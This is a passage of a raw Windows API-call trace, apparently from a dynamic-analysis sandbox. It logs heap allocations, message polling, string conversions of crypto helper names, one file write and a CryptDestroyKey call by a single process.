wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0266.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0266.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.103] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0266.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.103] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0266.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0266.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.103] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.104] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.104] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0266.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0266.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0266.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0266.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0266.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0266.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0266.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0266.117] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.117] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.117] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0266.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.117] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0266.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0266.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0266.118] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0266.118] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.118] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x53d0) returned 0x2f2af60 [0266.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x53d0) returned 0x2f35710 [0266.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2af60 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x53d0) returned 0x2f2af60 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f35710 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x53d0) returned 0x2f35710 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2af60 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f25b88 | out: hHeap=0x970000) returned 1 [0266.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0266.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f207b8 | out: hHeap=0x970000) returned 1 [0266.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0266.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f30338 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.128] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.157] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.157] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0266.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0266.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.158] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f3fec0*, nNumberOfBytesToWrite=0x53d0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f3fec0*, lpNumberOfBytesWritten=0x8cf5e4*=0x53d0, lpOverlapped=0x0) returned 1 [0266.160] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.160] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0266.160] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0266.160] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.161] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.161] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.161] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0266.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51928, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0266.162] CryptDestroyKey (hKey=0xa870d0) returned 1 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 